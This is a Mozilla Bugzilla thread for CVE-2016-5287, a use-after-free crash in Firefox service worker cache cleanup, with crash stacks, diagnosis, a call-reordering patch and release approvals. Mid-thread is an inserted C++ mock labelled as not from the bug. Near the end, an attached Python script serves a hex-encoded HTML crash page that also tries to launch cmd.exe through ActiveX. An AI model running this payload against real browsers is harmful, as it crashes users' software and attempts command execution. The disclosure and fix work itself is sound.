Closed Bug 1309823 (CVE-2016-5287) Opened 8 years ago Closed 8 years ago

Crash in nsTArray_base<T>::SwapArrayElements<T> | nsTArray_Impl<T>::SwapElements<T> | mozilla::ipc::FileDescriptorSetChild::ForgetFileDescriptors

Categories: Core :: DOM: Service Workers, defect
Version: 49 Branch
Hardware: x86
OS: Windows
Type: defect
Priority: Not set
Severity: critical

Status: RESOLVED FIXED
Target Milestone: mozilla52

Tracking Status
firefox49 + fixed
firefox-esr45 --- unaffected
firefox50 + fixed
firefox51 --- fixed
firefox52 + fixed

People: Reporter: philipp, Assigned: bkelly
This bug was filed from the Socorro interface and is report bp-6e8fc599-f021-4b0c-b5a3-cda7d2161013.
=============================================================
Crashing Thread (27)
Frame 	Module 	Signature 	Source
0 	xul.dll 	nsTArray_base<nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils>::SwapArrayElements<nsTArrayInfallibleAllocator, nsTArrayInfallibleAllocator>(nsTArray_base<nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils>&, unsigned int, unsigned int) 	obj-firefox/dist/include/nsTArray-inl.h:346
1 	xul.dll 	nsTArray_Impl<nsCOMPtr<nsIRunnable>, nsTArrayInfallibleAllocator>::SwapElements<nsTArrayInfallibleAllocator>(nsTArray_Impl<nsCOMPtr<nsIRunnable>, nsTArrayInfallibleAllocator>&) 	obj-firefox/dist/include/nsTArray.h:1661
2 	xul.dll 	mozilla::ipc::FileDescriptorSetChild::ForgetFileDescriptors(nsTArray<mozilla::ipc::FileDescriptor>&) 	ipc/glue/FileDescriptorSetChild.cpp:28
3 	xul.dll 	mozilla::ipc::`anonymous namespace'::CleanupIPCStream 	ipc/glue/IPCStreamUtils.cpp:183
4 	xul.dll 	mozilla::ipc::AutoIPCStream::~AutoIPCStream() 	ipc/glue/IPCStreamUtils.cpp:343
5 	xul.dll 	mozilla::UniquePtr<mozilla::ipc::AutoIPCStream, mozilla::DefaultDelete<mozilla::ipc::AutoIPCStream> >::reset(mozilla::ipc::AutoIPCStream*) 	obj-firefox/dist/include/mozilla/UniquePtr.h:342
6 	xul.dll 	mozilla::dom::cache::AutoChildOpArgs::~AutoChildOpArgs() 	dom/cache/AutoUtils.cpp:141
7 	xul.dll 	mozilla::dom::cache::Cache::Put(mozilla::dom::RequestOrUSVString const&, mozilla::dom::Response&, mozilla::ErrorResult&) 	dom/cache/Cache.cpp:421
8 	xul.dll 	mozilla::dom::CacheBinding::put 	obj-firefox/dom/bindings/CacheBinding.cpp:873
9 	xul.dll 	mozilla::dom::CacheBinding::put_promiseWrapper 	obj-firefox/dom/bindings/CacheBinding.cpp:893

This signature is regressing in 50.0b builds and is mainly happening in the content process. In 50.0b6 these crashes are currently accounting for 3% of all content crashes.

Some correlations for the signature on 50.0b:
(100.0% in signature vs 00.23% overall) address = 0xffffffffe5e5e5e9
(81.98% in signature vs 21.36% overall) "EGL?" in app_notes = true
(81.98% in signature vs 21.96% overall) "WebGL?" in app_notes = true
(100.0% in signature vs 40.37% overall) reason = EXCEPTION_ACCESS_VIOLATION_READ
(72.97% in signature vs 20.35% overall) "EGL+" in app_notes = true
(80.18% in signature vs 27.71% overall) dom_ipc_enabled = 1
(72.97% in signature vs 20.83% overall) "WebGL+" in app_notes = true
(72.97% in signature vs 21.48% overall) "GL Context+" in app_notes = true
(72.97% in signature vs 21.48% overall) "GL Context?" in app_notes = true
The crash first started to appear on 2016-10-10 with various different beta versions though, so some external factor may play into this as well.
Based on https://bugzilla.mozilla.org/show_bug.cgi?id=1283823#c26 it may be that the e5e5e5e part of the address is indicative of a security issue, so I'm flagging this as a precaution.
Group: core-security
Flags: needinfo?(dveditz)
Not very useful (very generic) stack, but looks like UAF and something to do with workers and maybe the SW cache.
Group: core-security → dom-core-security
Component: General → DOM: Workers
Flags: needinfo?(dveditz) → needinfo?(bkelly)
Maybe the URLs in the crashes will be useful if this hit different build IDs around the same time.

Lots of zalora.co.id
Component: DOM: Workers → DOM: Service Workers
I would have guessed this was introduced in bug 1093357, but that landed in FF49.

I think I see the problem, though:

      if (!aConsumedByIPC) {
        Unused << fdSetActor->Send__delete__(fdSetActor);
      }

      // FileDescriptorSet doesn't clear its fds in its ActorDestroy, so we
      // unconditionally forget them here.  The fds themselves are auto-closed in
      // ~FileDescriptor since they originated in this process.
      fdSetActor->ForgetFileDescriptors(fds);

We should delete the actor after telling it to forget its file descriptors.
Assignee: nobody → bkelly
Status: NEW → ASSIGNED
Flags: needinfo?(bkelly)
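As an added example (not code from this bug or from Firefox), the ordering problem described in the comment above, modelled with a mock actor whose Send__delete__ destroys it immediately; a liveness registry turns the use-after-free into a failed return value instead of undefined behaviour. MockFdSetActor, CleanupIPCStream's two flags and the fd values are constructed stand-ins for the real ipc/glue types.

```cpp
// Added example, not Firefox code: a mock of the FileDescriptorSet actor whose
// Send__delete__ destroys it at once, plus a liveness registry so the buggy
// ordering becomes a checkable failure instead of undefined behaviour.
#include <set>
#include <utility>
#include <vector>

struct FileDescriptor { int fd; };          // stand-in for mozilla::ipc::FileDescriptor
static std::set<const void*> gLiveActors;   // addresses of actors not yet deleted

class MockFdSetActor {  // hypothetical stand-in for FileDescriptorSetChild
 public:
  explicit MockFdSetActor(std::vector<FileDescriptor> aFds) : mFds(std::move(aFds)) {
    gLiveActors.insert(this);
  }
  ~MockFdSetActor() { gLiveActors.erase(this); }

  // Like IPDL's Send__delete__: the actor may be gone before this returns.
  static void Send__delete__(MockFdSetActor* aActor) { delete aActor; }

  // Static so a dead pointer is only compared, never dereferenced.
  // Returns false where the real code would touch freed memory.
  static bool ForgetFileDescriptors(MockFdSetActor* aActor,
                                    std::vector<FileDescriptor>& aOut) {
    if (gLiveActors.count(aActor) == 0) {
      return false;  // use-after-free in the real code (the SwapElements crash)
    }
    aOut.swap(aActor->mFds);  // hand the fds back; the actor no longer owns them
    return true;
  }

 private:
  std::vector<FileDescriptor> mFds;
};

// Mirrors CleanupIPCStream. aFixedOrder=false is the order quoted in the
// comment above; aFixedOrder=true is the patch's order (forget, then delete).
// Returns the number of fds recovered, or -1 when the actor was already gone.
int CleanupIPCStream(bool aConsumedByIPC, bool aFixedOrder) {
  auto* fdSetActor = new MockFdSetActor({{3}, {4}});  // constructed sample fds
  std::vector<FileDescriptor> fds;
  bool ok;
  if (aFixedOrder) {
    ok = MockFdSetActor::ForgetFileDescriptors(fdSetActor, fds);
    if (!aConsumedByIPC) MockFdSetActor::Send__delete__(fdSetActor);
  } else {
    if (!aConsumedByIPC) MockFdSetActor::Send__delete__(fdSetActor);
    ok = MockFdSetActor::ForgetFileDescriptors(fdSetActor, fds);
  }
  // When IPC consumed the stream the peer owns deletion; free the mock here.
  if (gLiveActors.count(fdSetActor)) delete fdSetActor;
  return ok ? static_cast<int>(fds.size()) : -1;
}
```

Only the not-consumed, original-order path fails; the patch's order recovers both fds before the actor is destroyed.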
Sylvestre, if we do a point release for FF49, I'd like to have this ride-along.  I will have patches up shortly.
Flags: needinfo?(sledru)
I think this is a pretty clear ordering violation.  We must call the method on the actor before starting its deletion.
Attachment #8800794 - Flags: review?(wmccloskey)
Attachment #8800794 - Flags: review?(wmccloskey) → review+
OK, we are discussing a dot release for a JS issue, redirecting to Liz.
Flags: needinfo?(sledru) → needinfo?(lhenry)
This bug has 49 as unaffected, so it doesn't sound like a candidate for a dot release.

Also, this should have sec-approval before it lands if you think 51/52 are also affected.
Flags: needinfo?(lhenry)
Comment on attachment 8800794 [details] [diff] [review]
Forget file descriptors before starting actor destruction. r=billm

[Security approval request comment]
How easily could an exploit be constructed based on the patch?

Moderately difficult.  They would have to understand the implication that Send__delete__() can immediately delete an actor and how this ipc/glue code is called.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?

I don't think the commit message includes any more information than the patch.  It references "destruction", but I am moving a method that includes "delete" in its name.

Which older supported branches are affected by this flaw?

FF49+

If not all supported branches, which bug introduced the flaw?

Bug 1093357

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?

This should apply cleanly.

How likely is this patch to cause regressions; how much testing does it need?

Minimal risk.  It's reordering two calls.  We've fixed similar bugs in the past with changes almost identical to this.

I've also done a try build with an obscured patch name/message:

https://treeherder.mozilla.org/#/jobs?repo=try&revision=e9f99b26d967bfbbd91485cf503dbb78d9aaa429
Attachment #8800794 - Flags: sec-approval?
Attachment #8800794 - Flags: approval-mozilla-release?
Attachment #8800794 - Flags: approval-mozilla-beta?
Attachment #8800794 - Flags: approval-mozilla-aurora?
Liz, it was marked 49 unaffected because the crashes are not showing there.  The bug that introduced the flaw did land in FF49, though.  If no other point release was happening I probably would not push for one.  But I think it would be prudent to do this as a ride-along.
Flags: needinfo?(lhenry)
Based on bug 1093357 I'm going to mark FF49 affected.
sec-approval+ for trunk. We'll need release management approval for Aurora and Beta patches. I'd like to take it there though.
Attachment #8800794 - Flags: sec-approval? → sec-approval+
Comment on attachment 8800794 [details] [diff] [review]
Forget file descriptors before starting actor destruction. r=billm

Sec-high, let's take this on release as well as other branches. I am now aiming for a dot release for mid-next week.
Flags: needinfo?(lhenry)
Attachment #8800794 - Flags: approval-mozilla-release?
Attachment #8800794 - Flags: approval-mozilla-release+
Attachment #8800794 - Flags: approval-mozilla-beta?
Attachment #8800794 - Flags: approval-mozilla-beta+
Attachment #8800794 - Flags: approval-mozilla-aurora?
Attachment #8800794 - Flags: approval-mozilla-aurora+
Went ahead and landed this on inbound to be able to uplift to release branches hopefully before the weekend in https://hg.mozilla.org/integration/mozilla-inbound/rev/e62579becf83fb7b8524bba995af9c94b20c4ec9
Per comment 15.

Carsten, thanks for landing!
https://hg.mozilla.org/mozilla-central/rev/e62579becf83
Status: ASSIGNED → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla52
Un-track for 51 as it's fixed.
(In reply to Ritu Kothari (:ritu) from comment #22)
> Hi Ben, this is another crash signature that is trending up in Beta50.
> https://crash-stats.mozilla.org/signature/?date=%3C2016-10-17T17%3A10%3A00%2B00%3A00&date=%3E%3D2016-10-10T17%3A10%3A00%2B00%3A00&product=Firefox&version=50.0b&signature=nsTArray_base%3CT%3E%3A%3ASwapArrayElements%3CT%3E%20%7C%20nsTArray_Impl%3CT%3E%3A%3ASwapElements%3CT%3E%20%7C%20mozilla%3A%3Aipc%3A%3AFileDescriptorSetParent%3A%3AForgetFileDescriptors
> 
> Do you think this is a different problem or it should also be fixed with this one?

It should be fixed with the patches landed here.  What beta do we expect this fix to be included in?  I thought it would be in 50b7, but maybe I was confused.
Flags: needinfo?(bkelly)
Ah, I see FF50b7 was built from this push:

https://hg.mozilla.org/releases/mozilla-beta/rev/6efc0964ec62bc4abfdc4cb1dc7cc461c3238634

That push does not seem to include this bug's patch yet, so I am hopeful both these crashes will be fixed by this patch.
A number of service worker related intermittents seem to have dropped off to zero over the weekend as well.  Hoping that those are all fixed by this.
Alias: CVE-2016-5287
FWIW there have been no reports of either crash signature since this was released.
I'm adding the second signature here then. It's strange because it stopped abruptly on 2016-10-17.
Crash Signature: [@ nsTArray_base<T>::SwapArrayElements<T> | nsTArray_Impl<T>::SwapElements<T> | mozilla::ipc::FileDescriptorSetChild::ForgetFileDescriptors] → [@ nsTArray_base<T>::SwapArrayElements<T> | nsTArray_Impl<T>::SwapElements<T> | mozilla::ipc::FileDescriptorSetChild::ForgetFileDescriptors] [@ nsTArray_base<T>::SwapArrayElements<T> | nsTArray_Impl<T>::SwapElements<T> | mozilla::ipc::FileDescriptorSetPa…
Group: dom-core-security
Attached file firefox.txt
#Exploit Title: Mozilla Firefox 49.0.2 Crash
#2-11-2016
#Author: sultan albalawi
#video :https://www.facebook.com/pentest3/videos/vb.100012552940568/204971129931317/?type=2&theater
#it's working  with tor browser you can try
#Tested on:win7
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
host='192.168.88.254'
port=8080
i=0
ban = ''  # hex-encoded ASCII-art banner omitted
print ban
print "please wait ...."
htmlcrach=('''\x3c\x68\x74\x6d\x6c\x3e\x0d\x0a\x3c\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x3e\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x65\x78\x28\x29\x0d\x0a\x7b\x0d\x0a\x76\x61\x72\x20\x6f\x62\x6a\x53\x68\x65\x6c\x6c\x20\x3d\x20\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x73\x68\x65\x6c\x6c\x2e\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x22\x29\x3b\x0d\x0a\x6f\x62\x6a\x53\x68\x65\x6c\x6c\x2e\x53\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x28\x22\x63\x6d\x64\x2e\x65\x78\x65\x22\x2c\x20\x22\x63\x64\x20\x43\x3a\x20\x43\x3a\x5c\x5c\x63\x64\x20\x63\x3a\x5c\x5c\x65\x78\x74\x5f\x66\x69\x6c\x65\x20\x6d\x61\x69\x6e\x2e\x65\x78\x65\x20\x74\x65\x73\x74\x2e\x74\x78\x74\x22\x2c\x20\x22\x43\x3a\x5c\x5c\x57\x49\x4e\x44\x4f\x57\x53\x5c\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x22\x2c\x20\x22\x6f\x70\x65\x6e\x22\x2c\x20\x31\x29\x3b\x0d\x0a\x7d\x0d\x0a\x7b\x0d\x0a\x76\x61\x72\x20\x62\x75\x66\x20\x3d\x20\x22\x22\x3b\x0d\x0a\x66\x6f\x72\x20\x28\x76\x61\x72\x20\x69\x20\x3d\x20\x30\x3b\x20\x69\x20\x3c\x35\x30\x30\x30\x30\x3b\x20\x69\x2b\x2b\x29\x20\x7b\x0d\x0a\x62\x75\x66\x20\x2b\x3d\x20\x22\x41\x22\x3b\x0d\x0a\x7d\x0d\x0a\x76\x61\x72\x20\x62\x75\x66\x66\x20\x3d\x20\x62\x75\x66\x3b\x0d\x0a\x66\x6f\x72\x20\x28\x69\x20\x3d\x20\x30\x3b\x20\x69\x20\x3c\x35\x30\x30\x30\x3b\x20\x69\x2b\x2b\x29\x20\x7b\x0d\x0a\x62\x75\x66\x66\x20\x2b\x3d\x20\x62\x75\x66\x3b\x0d\x0a\x7d\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x74\x69\x74\x6c\x65\x20\x3d\x20\x62\x75\x66\x66\x3b\x0d\x0a\x7d\x0d\x0a\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e\x0d\x0a\x3c\x2f\x61\x3e\x3c\x2f\x62\x6f\x64\x79\x3e\x3c\x2f\x68\x74\x6d\x6c\x3e''')
while i <= 5000:
    i+=1
    ban+=htmlcrach
class Req(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-type','text/html')
        self.end_headers()
        self.wfile.write(htmlcrach)
class runHTTP(HTTPServer):
    def __init__(self,host,port):
        ipadd=(host,port)
        HTTPServer.__init__(self,ipadd,Req)
def createfile():
    global filecreate
    filecreate = "test.html"
    open(filecreate, "wb").write(htmlcrach)
    print ('file done: {}').format(filecreate)
def start():
    global filecreate
    ser=runHTTP(host,port)
    print "http://{}:{}/{}".format(host,port,filecreate)
    ser.serve_forever()
createfile()
start()
Flags: needinfo?(madperson)
Mozilla Firefox 49.0.1 - Denial of Service
#Date: 15 Oct 2016
https://www.exploit-db.com/exploits/40536/
Flags: needinfo?(madperson)
Please file a new bug if you think you've found something new.
Flags: needinfo?(sultanalbalawi00)
(In reply to Marco Castelluccio [:marco] from comment #30)
> Please file a new bug if you think you've found something new.

I did
https://bugzilla.mozilla.org/show_bug.cgi?id=1314862

thanks
Flags: needinfo?(sultanalbalawi00)